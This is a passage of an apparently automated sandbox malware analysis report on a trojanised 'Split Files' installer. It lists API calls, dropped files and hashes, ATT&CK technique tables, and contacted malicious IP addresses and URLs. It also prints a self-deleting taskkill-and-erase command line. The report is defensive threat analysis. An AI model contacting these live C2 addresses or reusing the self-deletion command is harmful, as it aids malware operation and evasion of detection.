                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 5_2_0040F5F5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 5_2_0040EBD2 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 5_2_10006180 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 5_2_100035DF SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 5_2_10003AD4 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                Source: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\KN38AzDG.exeCode function: 6_2_00101889 SetUnhandledExceptionFilter,
                Source: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\KN38AzDG.exeCode function: 6_2_00101269 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                Source: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\KN38AzDG.exeCode function: 6_2_001016F5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                Source: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\KN38AzDG.exeCode function: 6_2_00104362 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "SplitFiles131.exe" /f
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /im "SplitFiles131.exe" /f & erase "C:\Program Files (x86)\Split Files\SplitFiles131.exe" & exit
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "SplitFiles131.exe" /f
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_00459734 GetVersion,GetModuleHandleA,6CAD5550,6CAD5550,6CAD5550,AllocateAndInitializeSid,LocalFree,
                Source: SplitFiles131.exe, 00000005.00000002.372668161.000000000351F000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: Program Manager
                Source: SplitFiles131.exe, 00000005.00000002.372668161.000000000351F000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: program manager
                Source: SplitFiles131.exe, 00000005.00000002.372668161.000000000351F000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: F.program manager
                Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoA,
                Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoA,
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: GetLocaleInfoA,
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: GetLocaleInfoA,
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: GetKeyboardLayoutList,GetLocaleInfoA,__Init_thread_footer,
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: EnumSystemLocalesW,
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: EnumSystemLocalesW,
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: EnumSystemLocalesW,
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: EnumSystemLocalesW,
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: GetLocaleInfoW,
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: GetLocaleInfoW,
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: GetLocaleInfoW,
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 5_2_0040F7F3 cpuid
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_00455E7C GetTickCount,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetCurrentProcessId,CreateNamedPipeA,GetLastError,6CAD5CA0,SetNamedPipeHandleState,6CF47180,CloseHandle,CloseHandle,
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_004026C4 GetSystemTime,
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00405CC0 GetVersionExA,
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_00453D18 GetUserNameA,

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 5.2.SplitFiles131.exe.3340000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.SplitFiles131.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.SplitFiles131.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.SplitFiles131.exe.3340000.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.372442187.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.372529330.0000000003340000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Valid Accounts1
                Windows Management Instrumentation
                Path Interception1
                Access Token Manipulation
                1
                Disable or Modify Tools
                1
                Input Capture
                1
                System Time Discovery
                Remote Services1
                Archive Collected Data
                Exfiltration Over Other Network Medium2
                Ingress Tool Transfer
                Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                Default Accounts2
                Native API
                Boot or Logon Initialization Scripts13
                Process Injection
                1
                Deobfuscate/Decode Files or Information
                LSASS Memory1
                Account Discovery
                Remote Desktop Protocol1
                Input Capture
                Exfiltration Over Bluetooth2
                Encrypted Channel
                Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain Accounts2
                Command and Scripting Interpreter
                Logon Script (Windows)Logon Script (Windows)3
                Obfuscated Files or Information
                Security Account Manager3
                File and Directory Discovery
                SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
                Non-Application Layer Protocol
                Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)23
                Software Packing
                NTDS26
                System Information Discovery
                Distributed Component Object ModelInput CaptureScheduled Transfer11
                Application Layer Protocol
                SIM Card SwapCarrier Billing Fraud
                Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script2
                Masquerading
                LSA Secrets14
                Security Software Discovery
                SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                Replication Through Removable MediaLaunchdRc.commonRc.common1
                Virtualization/Sandbox Evasion
                Cached Domain Credentials1
                Virtualization/Sandbox Evasion
                VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                External Remote ServicesScheduled TaskStartup ItemsStartup Items1
                Access Token Manipulation
                DCSync3
                Process Discovery
                Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job13
                Process Injection
                Proc Filesystem11
                Application Window Discovery
                Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadow1
                System Owner/User Discovery
                Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 778228 Sample: file.exe Startdate: 05/01/2023 Architecture: WINDOWS Score: 96 47 45.139.105.1 CMCSUS Italy 2->47 49 85.31.46.167 CLOUDCOMPUTINGDE Germany 2->49 51 Snort IDS alert for network traffic 2->51 53 Antivirus detection for URL or domain 2->53 55 Detected unpacking (changes PE section rights) 2->55 57 4 other signatures 2->57 10 file.exe 2 2->10         started        signatures3 process4 file5 31 C:\Users\user\AppData\Local\...\is-DTRND.tmp, PE32 10->31 dropped 13 is-DTRND.tmp 13 30 10->13         started        process6 file7 33 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 13->33 dropped 35 C:\Users\user\AppData\Local\...\_iscrypt.dll, PE32 13->35 dropped 37 C:\...\unins000.exe (copy), PE32 13->37 dropped 39 3 other files (2 malicious) 13->39 dropped 16 SplitFiles131.exe 24 13->16         started        process8 dnsIp9 41 107.182.129.235, 49706, 80 META-ASUS Reserved 16->41 43 171.22.30.106, 49707, 80 CMCSUS Germany 16->43 45 45.139.105.171, 49705, 80 CMCSUS Italy 16->45 29 C:\Users\user\AppData\...\KN38AzDG.exe, PE32 16->29 dropped 20 KN38AzDG.exe 16->20         started        23 cmd.exe 1 16->23         started        file10 process11 signatures12 59 Multi AV Scanner detection for dropped file 20->59 25 taskkill.exe 1 23->25         started        27 conhost.exe 23->27         started        process13

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                No Antivirus matches
                SourceDetectionScannerLabelLink
                C:\Program Files (x86)\Split Files\SplitFiles131.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Local\Temp\is-D5FV2.tmp\_iscrypt.dll0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\is-D5FV2.tmp\_isetup\_setup64.tmp0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\is-D5FV2.tmp\_isetup\_shfoldr.dll0%ReversingLabs
                C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\KN38AzDG.exe50%ReversingLabsWin32.Trojan.Generic
                SourceDetectionScannerLabelLinkDownload
                5.2.SplitFiles131.exe.10000000.6.unpack100%AviraTR/Crypt.XPACK.Gen8Download File
                1.2.file.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.Gen2Download File
                5.2.SplitFiles131.exe.400000.0.unpack100%AviraHEUR/AGEN.1250671Download File
                4.2.is-DTRND.tmp.400000.0.unpack100%AviraHEUR/AGEN.1248792Download File
                1.0.file.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.Gen2Download File
                No Antivirus matches
                SourceDetectionScannerLabelLink
                http://www.innosetup.com/0%URL Reputationsafe
                http://www.innosetup.com/0%URL Reputationsafe
                http://45.139.105.171/itsnotmalware/count.php?sub=NOSUB&stream=mixtwo&substream=mixinte0%URL Reputationsafe
                http://107.182.129.235/storage/extension.php0%URL Reputationsafe
                http://www.remobjects.com/?ps0%URL Reputationsafe
                http://www.innosetup.com0%URL Reputationsafe
                http://107.182.129.235/storage/ping.php0%URL Reputationsafe
                http://171.22.30.106/library.php100%URL Reputationmalware
                http://www.remobjects.com/?psU0%URL Reputationsafe
                http://rus.altarsoft.com/split_files.shtml0%Avira URL Cloudsafe
                http://www.altarsoft.com/split_files.shtml0%Avira URL Cloudsafe
                http://www.altarsoft.com/split_files.shtml2%VirustotalBrowse
                http://171.22.30.106/library.phpch100%Avira URL Cloudmalware
                http://www.innosetup.comDVarFileInfo$0%Avira URL Cloudsafe
                http://171.22.30.106/library.phpYQ100%Avira URL Cloudmalware
                http://171.22.30.106/library.php4100%Avira URL Cloudmalware
                No contacted domains info
                NameMaliciousAntivirus DetectionReputation
                http://45.139.105.171/itsnotmalware/count.php?sub=NOSUB&stream=mixtwo&substream=mixintetrue
                • URL Reputation: safe
                unknown
                http://107.182.129.235/storage/extension.phptrue
                • URL Reputation: safe
                unknown
                http://107.182.129.235/storage/ping.phptrue
                • URL Reputation: safe
                unknown
                http://171.22.30.106/library.phptrue
                • URL Reputation: malware
                unknown
                NameSourceMaliciousAntivirus DetectionReputation
                http://www.innosetup.com/is-DTRND.tmp, is-DTRND.tmp, 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, is-AGVDF.tmp.4.dr, is-DTRND.tmp.1.drfalse
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                http://www.altarsoft.com/split_files.shtmlis-DTRND.tmp, 00000004.00000002.373470298.000000000018F000.00000004.00000010.00020000.00000000.sdmp, is-DTRND.tmp, 00000004.00000002.374801354.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, is-8E2LT.tmp.4.dr, is-7O3KV.tmp.4.dr, is-R2P47.tmp.4.dr, is-JMARM.tmp.4.dr, is-B20UO.tmp.4.dr, is-UJJ0L.tmp.4.dr, is-JSP8F.tmp.4.dr, is-79U67.tmp.4.dr, is-APJVT.tmp.4.dr, is-7L4JB.tmp.4.drfalse
                • 2%, Virustotal, Browse
                • Avira URL Cloud: safe
                unknown
                http://171.22.30.106/library.phpchSplitFiles131.exe, 00000005.00000003.354343284.00000000043C6000.00000004.00000800.00020000.00000000.sdmp, SplitFiles131.exe, 00000005.00000003.366040028.00000000043C6000.00000004.00000800.00020000.00000000.sdmp, SplitFiles131.exe, 00000005.00000003.343762944.00000000043C6000.00000004.00000800.00020000.00000000.sdmp, SplitFiles131.exe, 00000005.00000003.349052998.00000000043C6000.00000004.00000800.00020000.00000000.sdmp, SplitFiles131.exe, 00000005.00000003.360534891.00000000043C6000.00000004.00000800.00020000.00000000.sdmptrue
                • Avira URL Cloud: malware
                unknown
                http://www.remobjects.com/?psfile.exe, 00000001.00000003.289027881.0000000002058000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000001.00000003.288799915.0000000002230000.00000004.00001000.00020000.00000000.sdmp, is-DTRND.tmp, is-DTRND.tmp, 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, is-AGVDF.tmp.4.dr, is-DTRND.tmp.1.drfalse
                • URL Reputation: safe
                unknown
                http://rus.altarsoft.com/split_files.shtmlis-DTRND.tmp, 00000004.00000002.373470298.000000000018F000.00000004.00000010.00020000.00000000.sdmp, is-DTRND.tmp, 00000004.00000002.374801354.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, is-3OAED.tmp.4.dr, is-FBKGV.tmp.4.drfalse
                • Avira URL Cloud: safe
                unknown
                http://www.innosetup.comfile.exefalse
                • URL Reputation: safe
                unknown
                http://171.22.30.106/library.phpYQSplitFiles131.exe, 00000005.00000003.354343284.00000000043C6000.00000004.00000800.00020000.00000000.sdmp, SplitFiles131.exe, 00000005.00000003.338258725.00000000043C6000.00000004.00000800.00020000.00000000.sdmp, SplitFiles131.exe, 00000005.00000003.366040028.00000000043C6000.00000004.00000800.00020000.00000000.sdmp, SplitFiles131.exe, 00000005.00000003.343762944.00000000043C6000.00000004.00000800.00020000.00000000.sdmp, SplitFiles131.exe, 00000005.00000003.349052998.00000000043C6000.00000004.00000800.00020000.00000000.sdmp, SplitFiles131.exe, 00000005.00000003.360534891.00000000043C6000.00000004.00000800.00020000.00000000.sdmptrue
                • Avira URL Cloud: malware
                unknown
                http://171.22.30.106/library.php4SplitFiles131.exe, 00000005.00000003.332714577.00000000043C6000.00000004.00000800.00020000.00000000.sdmp, SplitFiles131.exe, 00000005.00000003.338258725.00000000043C6000.00000004.00000800.00020000.00000000.sdmp, SplitFiles131.exe, 00000005.00000003.343762944.00000000043C6000.00000004.00000800.00020000.00000000.sdmp, SplitFiles131.exe, 00000005.00000003.327425336.00000000043C6000.00000004.00000800.00020000.00000000.sdmptrue
                • Avira URL Cloud: malware
                unknown
                http://www.innosetup.comDVarFileInfo$file.exe, 00000001.00000003.289316432.00000000020FD000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000001.00000003.288963142.00000000022D9000.00000004.00001000.00020000.00000000.sdmp, is-DTRND.tmp, 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmp, is-AGVDF.tmp.4.dr, is-DTRND.tmp.1.drfalse
                • Avira URL Cloud: safe
                low
                http://www.remobjects.com/?psUfile.exe, 00000001.00000003.289027881.0000000002058000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000001.00000003.288799915.0000000002230000.00000004.00001000.00020000.00000000.sdmp, is-DTRND.tmp, 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, is-AGVDF.tmp.4.dr, is-DTRND.tmp.1.drfalse
                • URL Reputation: safe
                unknown
                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs
                IPDomainCountryFlagASNASN NameMalicious
                45.139.105.171
                unknownItaly
                33657CMCSUStrue
                45.139.105.1
                unknownItaly
                33657CMCSUStrue
                85.31.46.167
                unknownGermany
                43659CLOUDCOMPUTINGDEtrue
                107.182.129.235
                unknownReserved
                11070META-ASUStrue
                171.22.30.106
                unknownGermany
                33657CMCSUStrue
                Joe Sandbox Version:36.0.0 Rainbow Opal
                Analysis ID:778228
                Start date and time:2023-01-05 08:46:10 +01:00
                Joe Sandbox Product:CloudBasic
                Overall analysis duration:0h 7m 19s
                Hypervisor based Inspection enabled:false
                Report type:light
                Sample file name:file.exe
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                Number of analysed new started processes analysed:14
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • HDC enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Detection:MAL
                Classification:mal96.troj.evad.winEXE@12/39@0/5
                EGA Information:
                • Successful, ratio: 100%
                HDC Information:Failed
                HCA Information:
                • Successful, ratio: 95%
                • Number of executed functions: 0
                • Number of non-executed functions: 0
                Cookbook Comments:
                • Found application associated with file extension: .exe
                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, conhost.exe, svchost.exe
                • TCP Packets have been reduced to 100
                • Excluded domains from analysis (whitelisted): client.wns.windows.com, ctldl.windowsupdate.com
                • Not all processes where analyzed, report is missing behavior information
                • Report size exceeded maximum capacity and may have missing behavior information.
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                TimeTypeDescription
                08:47:09API Interceptor1x Sleep call for process: KN38AzDG.exe modified
                No context
                No context
                No context
                No context
                No context
                Process:C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp
                File Type:ISO-8859 text, with CRLF line terminators
                Category:dropped
                Size (bytes):2193
                Entropy (8bit):4.702648325021821
                Encrypted:false
                SSDEEP:24:ElZ5/fnS3LWjwbf2VQZl5HXvbap4qDwGApRAboaGnMAzPelJoEhLifJy:mZ3jwbf2V25HjcwGpbpGMaelXh2g
                MD5:EA42A2F0D0B4CBE042DE38568E18F1AC
                SHA1:58B2B523D4CCB03A07F9B1CB53250F3C6BA0B771
                SHA-256:AF9B99F745D2B2F3E688336C68F69C9CADF7E85BF443100DDA4EBB507D86155A
                SHA-512:6F202138BE4B009152A72AB671A4C5D3AE5580211EDE11F4E35B89F2F1EF58E8B8DBD35E9DA1D12B7ABDD3BFD4EE342541DE8DE2437D0FCEA77A1C5782AE0E2A
                Malicious:false
                Reputation:moderate, very likely benign file
                Preview:Split Files 1.72....Contents:....1. Description...2. History...3. Localization...4. Contacts.....-----------------------------------------------------------------....1. Description.....Fast and easy file splitter and joiner...Split files by parts size or parts number...Create .bat file to merge parts without program.....-----------------------------------------------------------------....2. Development History:....17.10.2010 - update to version 1.72....- large files splitting error fix (over 2 Gb)..- new language: turkish....9.02.2010 - update to version 1.71....- split and join options in windows explorer pop-up menu....16.01.2010 - update to version 1.7....- new languages: dutch, italian, spanish..- delete input file after splitting....3.01.2010 - update to version 1.6....- compression (zip)..- drag and drop..- french language..- arabic language..- interface was changed....18.11.2008 - update to version 1.5....- large files splitting error fix (over 1 Gb)..- output folder selection..
                Process:C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp
                File Type:ISO-8859 text, with very long lines (1053), with CRLF line terminators
                Category:dropped
                Size (bytes):2942
                Entropy (8bit):5.0506474169868945
                Encrypted:false
                SSDEEP:48:mRIjSLoZpLobGyYly6y4cMUNYzLEDa3dMSsXNBIi3Dl0r4k1z9bcX4Xl9asUvn6d:IW7Lob1YEgcMiDa3WN7BW1zLV1mngV4+
                MD5:58D65074A58BC8EAE2D5A3B589399A53
                SHA1:074E7E5BFD52200086309913670D49BA664FB279
                SHA-256:2F2487EDEEEA0D35394FD1C0B72D9C1FBF617DD014ED659083BDB0EFB12F6C90
                SHA-512:C0806DFC9DCD2A620693115679057B5374DEA3930E02F2B8DD1390C843D3F7C138CA8576CA35A5BCBEEA68E5CD9F5193C8D564A942C5A179DB9C5E6CAAA00266
                Malicious:false
                Reputation:moderate, very likely benign file
                Preview:Split Files 1.72..............:....1. ...........2. ..........3. .............-----------------------------------------------------------------....1. ...................... ............. ... .......... ...... .. ..... ...... ..... . ............ .. .......... . ........ ..... ..... ..... ... ............ ... ........ ...... .. ......, ....... ........... ..... ........... ....... ... ........ .......... ....... ........ .... . .......... ... ..... ........... ..... ...... ........ ... ........ ..........: .. ..... ......, .. ....... ...... ...... ..... ..... ......... . ......, .........., .........., ........... ..... ....... .bat .... ... .......... ...... ... .......... ... ..... .......... ......... .bat .... . ..... ... ......... ..... ...... ... ............. . .bat ..... ........ ..... ........ ...... ..... ........ ...... ......... ...... ..... ..... ..... ..... ....., ........... zip ........... ... ...... ..... .......... ....... ...... ....., ....... ........ ........... ..
                Process:C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp
                File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                Category:modified
                Size (bytes):3491315
                Entropy (8bit):5.600225128146387
                Encrypted:false
                SSDEEP:24576:8kvs+hjRbEtvgIyhbpegN4X94JFlWchs9F4AyM1n6iuAdsGR0A2O3DyLaYtBlecd:8VQj5EtvSpZvJFIp9IM1ft22mHBldXXL
                MD5:361518D6CC3C25EEC2DFC1DE82B055B2
                SHA1:5B298ED47BDEFA0BB953F277649CCB7C3A308C3C
                SHA-256:616BB3AC1AE4651819FCD80CB8357940061AF64A21401C33E8C84CFF41679211
                SHA-512:4EFAC7D2D772FDD8D3DAC80CE7874D5E85957D39B8F1392E00CF8969F87076A1146363990212ED79E63ADEF92427514E3E7D957B2E3E3D056E5A6741D57FA030
                Malicious:true
                Antivirus:
                • Antivirus: Joe Sandbox ML, Detection: 100%
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....~.c.........._...............................@..........................P......]m5..............................................P...e...........................................................................................................text...2........................... ..`.rdata...+.......0..................@..@.data........0.......0..............@....tls.... ....@.......@..............@....rsrc....p...P...p...P..............@..@.ave131...+......+.................`.*.................................................................................................................................................................................................................................................................................................................................................................................................
                Process:C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp
                File Type:ISO-8859 text, with very long lines (1053), with CRLF line terminators
                Category:dropped
                Size (bytes):2942
                Entropy (8bit):5.0506474169868945
                Encrypted:false
                SSDEEP:48:mRIjSLoZpLobGyYly6y4cMUNYzLEDa3dMSsXNBIi3Dl0r4k1z9bcX4Xl9asUvn6d:IW7Lob1YEgcMiDa3WN7BW1zLV1mngV4+
                MD5:58D65074A58BC8EAE2D5A3B589399A53
                SHA1:074E7E5BFD52200086309913670D49BA664FB279
                SHA-256:2F2487EDEEEA0D35394FD1C0B72D9C1FBF617DD014ED659083BDB0EFB12F6C90
                SHA-512:C0806DFC9DCD2A620693115679057B5374DEA3930E02F2B8DD1390C843D3F7C138CA8576CA35A5BCBEEA68E5CD9F5193C8D564A942C5A179DB9C5E6CAAA00266
                Malicious:false
                Preview:Split Files 1.72..............:....1. ...........2. ..........3. .............-----------------------------------------------------------------....1. ...................... ............. ... .......... ...... .. ..... ...... ..... . ............ .. .......... . ........ ..... ..... ..... ... ............ ... ........ ...... .. ......, ....... ........... ..... ........... ....... ... ........ .......... ....... ........ .... . .......... ... ..... ........... ..... ...... ........ ... ........ ..........: .. ..... ......, .. ....... ...... ...... ..... ..... ......... . ......, .........., .........., ........... ..... ....... .bat .... ... .......... ...... ... .......... ... ..... .......... ......... .bat .... . ..... ... ......... ..... ...... ... ............. . .bat ..... ........ ..... ........ ...... ..... ........ ...... ......... ...... ..... ..... ..... ..... ....., ........... zip ........... ... ...... ..... .......... ....... ...... ....., ....... ........ ........... ..
                Process:C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp
                File Type:data
                Category:dropped
                Size (bytes):3491315
                Entropy (8bit):5.600224518949536
                Encrypted:false
                SSDEEP:24576:3kvs+hjRbEtvgIyhbpegN4X94JFlWchs9F4AyM1n6iuAdsGR0A2O3DyLaYtBlecd:3VQj5EtvSpZvJFIp9IM1ft22mHBldXXL
                MD5:F488A4815DE52F915E37E40EA88B011F
                SHA1:16F9954F5E9FE6CB50125396B7DB524218D01237
                SHA-256:E13C9E749995269A3C45C6464B2F0BF55283288FD020FE4D0F1CA811142CC2AC
                SHA-512:04262ADC77B3126FCB9A8991612DDCFC35DF7F35988D108079A0BACF04350C57E829CA8E8C74833D0A0D9D9CD1DD480B9F4FA7145051AECF85D23C85A90667E2
                Malicious:false
                Preview:.Z......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....~.c.........._...............................@..........................P......]m5..............................................P...e...........................................................................................................text...2........................... ..`.rdata...+.......0..................@..@.data........0.......0..............@....tls.... ....@.......@..............@....rsrc....p...P...p...P..............@..@.ave131...+......+.................`.*.................................................................................................................................................................................................................................................................................................................................................................................................
                Process:C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp
                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                Category:dropped
                Size (bytes):789258
                Entropy (8bit):6.369988626022893
                Encrypted:false
                SSDEEP:12288:EpmOmg1k2bfrP437QzH/A6A40lG77NzknuGyJOxOU:emt2bfrP437QzH/A6A7E7dVPUxOU
                MD5:D3BA43B9E1B3838F28AFC558F2991D5B
                SHA1:1132F1C76760281A591F7DF99D592283103FCC87
                SHA-256:1E95FE5D06884DF82D2BEAEDA09434ECAC2A347AEC5F03E71F20E39FB6C9E0E9
                SHA-512:870371843F59B91D75B6C4D4C637075235D25CF3ABB059B58E39F9CD2833533A8F434307E7AD1175FD45082D3B4E4F0ED79F303ED77DEF553587E2819C092022
                Malicious:true
                Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................4......X.............@..............................................@...............................%......l....................@...............................0......................................................CODE....l........................... ..`DATA................................@...BSS.....p................................idata...%.......&..................@....tls......... ...........................rdata.......0......................@..P.reloc..t....@......................@..P.rsrc...l...........................@..P....................................@..P........................................................................................................................................
                Process:C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp
                File Type:MS Windows 95 Internet shortcut text (URL=<http://www.altarsoft.com/split_files.shtml>), ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):97
                Entropy (8bit):5.12302231676258
                Encrypted:false
                SSDEEP:3:HRAbABGQYm/0S4UEtSNM5LTJOBCBuQpQQXXy:HRYFVm/r4UEtSeVTJuZQplHy
                MD5:DCD6923B008121BFF4C7C0AA1206286E
                SHA1:AD4EF16A96A80C8EA5DBC5933229580BC6C332E0
                SHA-256:E1E01BFA5E2B5A117A627F7E9E861CF63D852A66BCE0DF88094D59CAF61E4376
                SHA-512:EC4A399EB38A1FA64DF8990708168F134ACD0CA793930E57C6D3A260A537B20DFD9F8B7232987F32EC1C1A7CEC7EC91F15A644A63D275104D96588FC3D354B5C
                Malicious:false
                Preview:[InternetShortcut]..URL=http://www.altarsoft.com/split_files.shtml..Modified=500425EA770BCC01B2..
                Process:C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp
                File Type:ISO-8859 text, with CRLF line terminators
                Category:dropped
